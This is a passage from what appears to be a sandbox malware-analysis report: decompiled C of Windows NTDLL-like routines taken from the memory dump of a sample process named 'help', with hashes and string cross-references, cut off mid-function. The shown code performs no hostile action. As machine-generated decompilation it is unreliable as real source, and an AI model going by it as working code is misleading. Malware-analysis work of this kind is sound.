                            				_push(0x38a0d50);
                            				E0381D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                            					E03855720(0x65, 0, "Critical error detected %lx\n", _t35);
                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                            						asm("int3");
                            						 *(_t41 - 4) = 0xfffffffe;
                            					}
                            				}
                            				 *(_t41 - 4) = 1;
                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                            				 *((intOrPtr*)(_t41 - 0x64)) = L0381DEF0;
                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                            				_push(_t41 - 0x70);
                            				L0381DEF0(1, _t38);
                            				 *(_t41 - 4) = 0xfffffffe;
                            				return E0381D130(_t34, _t39, _t40);
                            			}






                            Strings
                            • Critical error detected %lx, xrefs: 03878E21
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: Critical error detected %lx
                            • API String ID: 0-802127002
                            • Opcode ID: da92a458d392bfd0589f088c676941c02f54fa8729634126587e869f0d33885c
                            • Instruction ID: 90c92a627a0bbc08118f25665a1110610f6d8d4df5ad2e84b46987c1a8e56fd8
                            • Opcode Fuzzy Hash: da92a458d392bfd0589f088c676941c02f54fa8729634126587e869f0d33885c
                            • Instruction Fuzzy Hash: 87115BB6D15348EADF24CFE8890A7ECBBB5BB04315F24429DE569AB382C3344605CF16
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0385FF60
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                            • API String ID: 0-1911121157
                            • Opcode ID: 1f6484b3c30043c1a0a3b1f7d6161ce66c649ae3013b719adfbb10fe4ea1e949
                            • Instruction ID: 10a394375a46ebd8dd1c55942dfa4b864e51beb0b971ea19d8ebe0219364c6e6
                            • Opcode Fuzzy Hash: 1f6484b3c30043c1a0a3b1f7d6161ce66c649ae3013b719adfbb10fe4ea1e949
                            • Instruction Fuzzy Hash: 66110475510644EFDB12EB94C848F9CB7B1FF09704F1880C4F605EB661CB389954CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E03895BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed int _t296;
                            				signed char _t298;
                            				signed int _t301;
                            				signed int _t306;
                            				signed int _t310;
                            				signed char _t311;
                            				intOrPtr _t312;
                            				signed int _t313;
                            				void* _t327;
                            				signed int _t328;
                            				intOrPtr _t329;
                            				intOrPtr _t333;
                            				signed char _t334;
                            				signed int _t336;
                            				void* _t339;
                            				signed int _t340;
                            				signed int _t356;
                            				signed int _t362;
                            				short _t367;
                            				short _t368;
                            				short _t373;
                            				signed int _t380;
                            				void* _t382;
                            				short _t385;
                            				signed short _t392;
                            				signed char _t393;
                            				signed int _t395;
                            				signed char _t397;
                            				signed int _t398;
                            				signed short _t402;
                            				void* _t406;
                            				signed int _t412;
                            				signed char _t414;
                            				signed short _t416;
                            				signed int _t421;
                            				signed char _t427;
                            				intOrPtr _t434;
                            				signed char _t435;
                            				signed int _t436;
                            				signed int _t442;
                            				signed int _t446;
                            				signed int _t447;
                            				signed int _t451;
                            				signed int _t453;
                            				signed int _t454;
                            				signed int _t455;
                            				intOrPtr _t456;
                            				intOrPtr* _t457;
                            				short _t458;
                            				signed short _t462;
                            				signed int _t469;
                            				intOrPtr* _t474;
                            				signed int _t475;
                            				signed int _t479;
                            				signed int _t480;
                            				signed int _t481;
                            				short _t485;
                            				signed int _t491;
                            				signed int* _t494;
                            				signed int _t498;
                            				signed int _t505;
                            				intOrPtr _t506;
                            				signed short _t508;
                            				signed int _t511;
                            				void* _t517;
                            				signed int _t519;
                            				signed int _t522;
                            				void* _t523;
                            				signed int _t524;
                            				void* _t528;
                            				signed int _t529;
                            
                            				_push(0xd4);
                            				_push(0x38a1178);
                            				E0381D0E8(__ebx, __edi, __esi);
                            				_t494 = __edx;
                            				 *(_t528 - 0xcc) = __edx;
                            				_t511 = __ecx;
                            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                            				 *(_t528 - 0xbc) = __ecx;
                            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                            				_t427 = 0;
                            				 *(_t528 - 0x74) = 0;
                            				 *(_t528 - 0x9c) = 0;
                            				 *(_t528 - 0x84) = 0;
                            				 *(_t528 - 0xac) = 0;
                            				 *(_t528 - 0x88) = 0;
                            				 *(_t528 - 0xa8) = 0;
                            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                            				if( *(_t528 + 0x1c) <= 0x80) {
                            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                            					if(__eflags != 0) {
                            						_t421 = E03894C56(0, __edx, __ecx, __eflags);
                            						__eflags = _t421;
                            						if(_t421 != 0) {
                            							 *((intOrPtr*)(_t528 - 4)) = 0;
                            							E0380D000(0x410);
                            							 *(_t528 - 0x18) = _t529;
                            							 *(_t528 - 0x9c) = _t529;
                            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                            							E03895542(_t528 - 0x9c, _t528 - 0x84);
                            						}
                            					}
                            					_t435 = _t427;
                            					 *(_t528 - 0xd0) = _t435;
                            					_t474 = _t511 + 0x65;
                            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                            					_t511 = 0x18;
                            					while(1) {
                            						 *(_t528 - 0xa0) = _t427;
                            						 *(_t528 - 0xbc) = _t427;
                            						 *(_t528 - 0x80) = _t427;
                            						 *(_t528 - 0x78) = 0x50;
                            						 *(_t528 - 0x79) = _t427;
                            						 *(_t528 - 0x7a) = _t427;
                            						 *(_t528 - 0x8c) = _t427;
                            						 *(_t528 - 0x98) = _t427;
                            						 *(_t528 - 0x90) = _t427;
                            						 *(_t528 - 0xb0) = _t427;
                            						 *(_t528 - 0xb8) = _t427;
                            						_t296 = 1 << _t435;
                            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                            						__eflags = _t436 & _t296;
                            						if((_t436 & _t296) != 0) {
                            							goto L92;
                            						}
                            						__eflags =  *((char*)(_t474 - 1));
                            						if( *((char*)(_t474 - 1)) == 0) {
                            							goto L92;
                            						}
                            						_t301 =  *_t474;
                            						__eflags = _t494[1] - _t301;
                            						if(_t494[1] <= _t301) {
                            							L10:
                            							__eflags =  *(_t474 - 5) & 0x00000040;
                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                            								L12:
                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                            									goto L92;
                            								}
                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                            									goto L92;
                            								}
                            								__eflags = _t442 -  *(_t474 - 0x11);
                            								if(_t442 !=  *(_t474 - 0x11)) {
                            									goto L92;
                            								}
                            								L15:
                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                            								 *(_t528 - 0xc0) = _t306;
                            								 *(_t528 - 0xa4) = _t306;
                            								__eflags =  *0x38b60e8;
                            								if( *0x38b60e8 != 0) {
                            									__eflags = _t306 - 0x40;
                            									if(_t306 < 0x40) {
                            										L20:
                            										asm("lock inc dword [eax]");
                            										_t310 =  *0x38b60e8; // 0x0
                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                            										__eflags = _t311 & 0x00000001;
                            										if((_t311 & 0x00000001) == 0) {
                            											 *(_t528 - 0xa0) = _t311;
                            											_t475 = _t427;
                            											 *(_t528 - 0x74) = _t427;
                            											__eflags = _t475;
                            											if(_t475 != 0) {
                            												L91:
                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                            												goto L92;
                            											}
                            											asm("sbb edi, edi");
                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                            											_t511 = _t498;
                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                            											__eflags =  *(_t312 - 5) & 1;
                            											if(( *(_t312 - 5) & 1) != 0) {
                            												_push(_t528 - 0x98);
                            												_push(0x4c);
                            												_push(_t528 - 0x70);
                            												_push(1);
                            												_push(0xfffffffa);
                            												_t412 = E03809710();
                            												_t475 = _t427;
                            												__eflags = _t412;
                            												if(_t412 >= 0) {
                            													_t414 =  *(_t528 - 0x98) - 8;
                            													 *(_t528 - 0x98) = _t414;
                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                            													 *(_t528 - 0x8c) = _t416;
                            													 *(_t528 - 0x79) = 1;
                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                            													__eflags = _t511;
                            												}
                            											}
                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                            											__eflags = _t446 & 0x00000004;
                            											if((_t446 & 0x00000004) != 0) {
                            												__eflags =  *(_t528 - 0x9c);
                            												if( *(_t528 - 0x9c) != 0) {
                            													 *(_t528 - 0x7a) = 1;
                            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                            													__eflags = _t511;
                            												}
                            											}
                            											_t313 = 2;
                            											_t447 = _t446 & _t313;
                            											__eflags = _t447;
                            											 *(_t528 - 0xd4) = _t447;
                            											if(_t447 != 0) {
                            												_t406 = 0x10;
                            												_t511 = _t511 + _t406;
                            												__eflags = _t511;
                            											}
                            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                            											 *(_t528 - 0x88) = _t427;
                            											__eflags =  *(_t528 + 0x1c);
                            											if( *(_t528 + 0x1c) <= 0) {
                            												L45:
                            												__eflags =  *(_t528 - 0xb0);
                            												if( *(_t528 - 0xb0) != 0) {
                            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                            													__eflags = _t511;
                            												}
                            												__eflags = _t475;
                            												if(_t475 != 0) {
                            													asm("lock dec dword [ecx+edx*8+0x4]");
                            													goto L100;
                            												} else {
                            													_t494[3] = _t511;
                            													_t451 =  *(_t528 - 0xa0);
                            													_t427 = E03806DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                            													 *(_t528 - 0x88) = _t427;
                            													__eflags = _t427;
                            													if(_t427 == 0) {
                            														__eflags = _t511 - 0xfff8;
                            														if(_t511 <= 0xfff8) {
                            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                            															asm("sbb ecx, ecx");
                            															__eflags = (_t451 & 0x000000e2) + 8;
                            														}
                            														asm("lock dec dword [eax+edx*8+0x4]");
                            														L100:
                            														goto L101;
                            													}
                            													_t453 =  *(_t528 - 0xa0);
                            													 *_t494 = _t453;
                            													_t494[1] = _t427;
                            													_t494[2] =  *(_t528 - 0xbc);
                            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                            													 *_t427 =  *(_t453 + 0x24) | _t511;
                            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													__eflags =  *(_t528 + 0x14);
                            													if( *(_t528 + 0x14) == 0) {
                            														__eflags =  *[fs:0x18] + 0xf50;
                            													}
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													__eflags =  *(_t528 + 0x18);
                            													if( *(_t528 + 0x18) == 0) {
                            														_t454 =  *(_t528 - 0x80);
                            														_t479 =  *(_t528 - 0x78);
                            														_t327 = 1;
                            														__eflags = 1;
                            													} else {
                            														_t146 = _t427 + 0x50; // 0x50
                            														_t454 = _t146;
                            														 *(_t528 - 0x80) = _t454;
                            														_t382 = 0x18;
                            														 *_t454 = _t382;
                            														 *((short*)(_t454 + 2)) = 1;
                            														_t385 = 0x10;
                            														 *((short*)(_t454 + 6)) = _t385;
                            														 *(_t454 + 4) = 0;
                            														asm("movsd");
                            														asm("movsd");
                            														asm("movsd");
                            														asm("movsd");
                            														_t327 = 1;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 = 0x68;
                            														 *(_t528 - 0x78) = _t479;
                            													}
                            													__eflags =  *(_t528 - 0x79) - _t327;
                            													if( *(_t528 - 0x79) == _t327) {
                            														_t524 = _t479 + _t427;
                            														_t508 =  *(_t528 - 0x8c);
                            														 *_t524 = _t508;
                            														_t373 = 2;
                            														 *((short*)(_t524 + 2)) = _t373;
                            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                            														 *((short*)(_t524 + 4)) = 0;
                            														_t167 = _t524 + 8; // 0x8
                            														E0380F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														_t380 =  *(_t528 - 0x80);
                            														__eflags = _t380;
                            														if(_t380 != 0) {
                            															_t173 = _t380 + 4;
                            															 *_t173 =  *(_t380 + 4) | 1;
                            															__eflags =  *_t173;
                            														}
                            														_t454 = _t524;
                            														 *(_t528 - 0x80) = _t454;
                            														_t327 = 1;
                            														__eflags = 1;
                            													}
                            													__eflags =  *(_t528 - 0xd4);
                            													if( *(_t528 - 0xd4) == 0) {
                            														_t505 =  *(_t528 - 0x80);
                            													} else {
                            														_t505 = _t479 + _t427;
                            														_t523 = 0x10;
                            														 *_t505 = _t523;
                            														_t367 = 3;
                            														 *((short*)(_t505 + 2)) = _t367;
                            														_t368 = 4;
                            														 *((short*)(_t505 + 6)) = _t368;
                            														 *(_t505 + 4) = 0;
                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                            														_t327 = 1;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 = _t479 + _t523;
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t454;
                            														if(_t454 != 0) {
                            															_t186 = _t454 + 4;
                            															 *_t186 =  *(_t454 + 4) | 1;
                            															__eflags =  *_t186;
                            														}
                            														 *(_t528 - 0x80) = _t505;
                            													}
                            													__eflags =  *(_t528 - 0x7a) - _t327;
                            													if( *(_t528 - 0x7a) == _t327) {
                            														 *(_t528 - 0xd4) = _t479 + _t427;
                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                            														E0380F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + _t522;
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t505;
                            														if(_t505 != 0) {
                            															_t199 = _t505 + 4;
                            															 *_t199 =  *(_t505 + 4) | 1;
                            															__eflags =  *_t199;
                            														}
                            														_t505 =  *(_t528 - 0xd4);
                            														 *(_t528 - 0x80) = _t505;
                            													}
                            													__eflags =  *(_t528 - 0xa8);
                            													if( *(_t528 - 0xa8) != 0) {
                            														_t356 = _t479 + _t427;
                            														 *(_t528 - 0xd4) = _t356;
                            														_t462 =  *(_t528 - 0xac);
                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                            														_t485 = 0xc;
                            														 *((short*)(_t356 + 2)) = _t485;
                            														 *(_t356 + 6) = _t462;
                            														 *((short*)(_t356 + 4)) = 0;
                            														_t211 = _t356 + 8; // 0x9
                            														E0380F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                            														E0380FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                            														_t529 = _t529 + 0x18;
                            														_t427 =  *(_t528 - 0x88);
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t505 =  *(_t528 - 0xd4);
                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														_t362 =  *(_t528 - 0x80);
                            														__eflags = _t362;
                            														if(_t362 != 0) {
                            															_t222 = _t362 + 4;
                            															 *_t222 =  *(_t362 + 4) | 1;
                            															__eflags =  *_t222;
                            														}
                            													}
                            													__eflags =  *(_t528 - 0xb0);
                            													if( *(_t528 - 0xb0) != 0) {
                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                            														_t458 = 0xb;
                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                            														E0380FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t505;
                            														if(_t505 != 0) {
                            															_t241 = _t505 + 4;
                            															 *_t241 =  *(_t505 + 4) | 1;
                            															__eflags =  *_t241;
                            														}
                            													}
                            													_t328 =  *(_t528 + 0x1c);
                            													__eflags = _t328;
                            													if(_t328 == 0) {
                            														L87:
                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                            														_t455 =  *(_t528 - 0xdc);
                            														 *(_t427 + 0x14) = _t455;
                            														_t480 =  *(_t528 - 0xa0);
                            														_t517 = 3;
                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                            															asm("rdtsc");
                            															 *(_t427 + 0x3c) = _t480;
                            														} else {
                            															 *(_t427 + 0x3c) = _t455;
                            														}
                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                            														_t456 =  *[fs:0x18];
                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                            														_t427 = 0;
                            														__eflags = 0;
                            														_t511 = 0x18;
                            														goto L91;
                            													} else {
                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                            														__eflags = _t519;
                            														 *(_t528 - 0x8c) = _t328;
                            														do {
                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                            																_t334 =  *_t519;
                            															} else {
                            																_t334 = 0;
                            															}
                            															_t336 = _t334 & 0x000000ff;
                            															__eflags = _t336;
                            															_t427 =  *(_t528 - 0x88);
                            															if(_t336 == 0) {
                            																_t481 = _t479 + _t506;
                            																__eflags = _t481;
                            																 *(_t528 - 0x78) = _t481;
                            																E0380F3E0(_t479 + _t427, _t457, _t506);
                            																_t529 = _t529 + 0xc;
                            															} else {
                            																_t340 = _t336 - 1;
                            																__eflags = _t340;
                            																if(_t340 == 0) {
                            																	E0380F3E0( *(_t528 - 0xb8), _t457, _t506);
                            																	_t529 = _t529 + 0xc;
                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                            																} else {
                            																	__eflags = _t340 == 0;
                            																	if(_t340 == 0) {
                            																		__eflags = _t506 - 8;
                            																		if(_t506 == 8) {
                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                            																		}
                            																	}
                            																}
                            															}
                            															_t339 = 0x10;
                            															_t519 = _t519 + _t339;
                            															_t263 = _t528 - 0x8c;
                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                            															__eflags =  *_t263;
                            															_t479 =  *(_t528 - 0x78);
                            														} while ( *_t263 != 0);
                            														goto L87;
                            													}
                            												}
                            											} else {
                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                            												 *(_t528 - 0xa2) = _t392;
                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                            												__eflags = _t469;
                            												while(1) {
                            													 *(_t528 - 0xe4) = _t511;
                            													__eflags = _t392;
                            													_t393 = _t427;
                            													if(_t392 != 0) {
                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                            													}
                            													_t395 = (_t393 & 0x000000ff) - _t427;
                            													__eflags = _t395;
                            													if(_t395 == 0) {
                            														_t511 = _t511 +  *_t469;
                            														__eflags = _t511;
                            													} else {
                            														_t398 = _t395 - 1;
                            														__eflags = _t398;
                            														if(_t398 == 0) {
                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                            														} else {
                            															__eflags = _t398 == 1;
                            															if(_t398 == 1) {
                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                            																_t402 =  *_t469 & 0x0000ffff;
                            																 *(_t528 - 0xac) = _t402;
                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                            															}
                            														}
                            													}
                            													__eflags = _t511 -  *(_t528 - 0xe4);
                            													if(_t511 <  *(_t528 - 0xe4)) {
                            														break;
                            													}
                            													_t397 =  *(_t528 - 0x88) + 1;
                            													 *(_t528 - 0x88) = _t397;
                            													_t469 = _t469 + 0x10;
                            													__eflags = _t397 -  *(_t528 + 0x1c);
                            													_t392 =  *(_t528 - 0xa2);
                            													if(_t397 <  *(_t528 + 0x1c)) {
                            														continue;
                            													}
                            													goto L45;
                            												}
                            												_t475 = 0x216;
                            												 *(_t528 - 0x74) = 0x216;
                            												goto L45;
                            											}
                            										} else {
                            											asm("lock dec dword [eax+ecx*8+0x4]");
                            											goto L16;
                            										}
                            									}
                            									_t491 = E03894CAB(_t306, _t528 - 0xa4);
                            									 *(_t528 - 0x74) = _t491;
                            									__eflags = _t491;
                            									if(_t491 != 0) {
                            										goto L91;
                            									} else {
                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                            										goto L20;
                            									}
                            								}
                            								L16:
                            								 *(_t528 - 0x74) = 0x1069;
                            								L93:
                            								_t298 =  *(_t528 - 0xd0) + 1;
                            								 *(_t528 - 0xd0) = _t298;
                            								_t474 = _t474 + _t511;
                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                            								_t494 = 4;
                            								__eflags = _t298 - _t494;
                            								if(_t298 >= _t494) {
                            									goto L100;
                            								}
                            								_t494 =  *(_t528 - 0xcc);
                            								_t435 = _t298;
                            								continue;
                            							}
                            							__eflags = _t494[2] | _t494[3];
                            							if((_t494[2] | _t494[3]) == 0) {
                            								goto L15;
                            							}
                            							goto L12;
                            						}
                            						__eflags = _t301;
                            						if(_t301 != 0) {
                            							goto L92;
                            						}
                            						goto L10;
                            						L92:
                            						goto L93;
                            					}
                            				} else {
                            					_push(0x57);
                            					L101:
                            					return E0381D130(_t427, _t494, _t511);
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ea249a93706d84412fd16badf39aa2e1f69bc515e0d4d84e7b67f2f5bb73f2b1
                            • Instruction ID: 3fd9636f37956b92fb7607ad1d7f12629c98e7a408843e2bde3a1b8b3aefa9a7
                            • Opcode Fuzzy Hash: ea249a93706d84412fd16badf39aa2e1f69bc515e0d4d84e7b67f2f5bb73f2b1
                            • Instruction Fuzzy Hash: 82424A759002298FEB24CFA8C880BA9F7B1FF49314F1981EAD94DEB241E7749985CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E037E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                            				signed int _v8;
                            				void* _v20;
                            				signed int _v24;
                            				char _v532;
                            				char _v540;
                            				signed short _v544;
                            				signed int _v548;
                            				signed short* _v552;
                            				signed short _v556;
                            				signed short* _v560;
                            				signed short* _v564;
                            				signed short* _v568;
                            				void* _v570;
                            				signed short* _v572;
                            				signed short _v576;
                            				signed int _v580;
                            				char _v581;
                            				void* _v584;
                            				unsigned int _v588;
                            				signed short* _v592;
                            				void* _v597;
                            				void* _v600;
                            				void* _v604;
                            				void* _v609;
                            				void* _v616;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				unsigned int _t161;
                            				signed int _t162;
                            				unsigned int _t163;
                            				void* _t169;
                            				signed short _t173;
                            				signed short _t177;
                            				signed short _t181;
                            				unsigned int _t182;
                            				signed int _t185;
                            				signed int _t213;
                            				signed int _t225;
                            				short _t233;
                            				signed char _t234;
                            				signed int _t242;
                            				signed int _t243;
                            				signed int _t244;
                            				signed int _t245;
                            				signed int _t250;
                            				void* _t251;
                            				signed short* _t254;
                            				void* _t255;
                            				signed int _t256;
                            				void* _t257;
                            				signed short* _t260;
                            				signed short _t265;
                            				signed short* _t269;
                            				signed short _t271;
                            				signed short** _t272;
                            				signed short* _t275;
                            				signed short _t282;
                            				signed short _t283;
                            				signed short _t290;
                            				signed short _t299;
                            				signed short _t307;
                            				signed int _t308;
                            				signed short _t311;
                            				signed short* _t315;
                            				signed short _t316;
                            				void* _t317;
                            				void* _t319;
                            				signed short* _t321;
                            				void* _t322;
                            				void* _t323;
                            				unsigned int _t324;
                            				signed int _t325;
                            				void* _t326;
                            				signed int _t327;
                            				signed int _t329;
                            
                            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                            				_v8 =  *0x38bd360 ^ _t329;
                            				_t157 = _a8;
                            				_t321 = _a4;
                            				_t315 = __edx;
                            				_v548 = __ecx;
                            				_t305 = _a20;
                            				_v560 = _a12;
                            				_t260 = _a16;
                            				_v564 = __edx;
                            				_v580 = _a8;
                            				_v572 = _t260;
                            				_v544 = _a20;
                            				if( *__edx <= 8) {
                            					L3:
                            					if(_t260 != 0) {
                            						 *_t260 = 0;
                            					}
                            					_t254 =  &_v532;
                            					_v588 = 0x208;
                            					if((_v548 & 0x00000001) != 0) {
                            						_v556 =  *_t315;
                            						_v552 = _t315[2];
                            						_t161 = E037FF232( &_v556);
                            						_t316 = _v556;
                            						_v540 = _t161;
                            						goto L17;
                            					} else {
                            						_t306 = 0x208;
                            						_t298 = _t315;
                            						_t316 = E037E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                            						if(_t316 == 0) {
                            							L68:
                            							_t322 = 0xc0000033;
                            							goto L39;
                            						} else {
                            							while(_v581 == 0) {
                            								_t233 = _v588;
                            								if(_t316 > _t233) {
                            									_t234 = _v548;
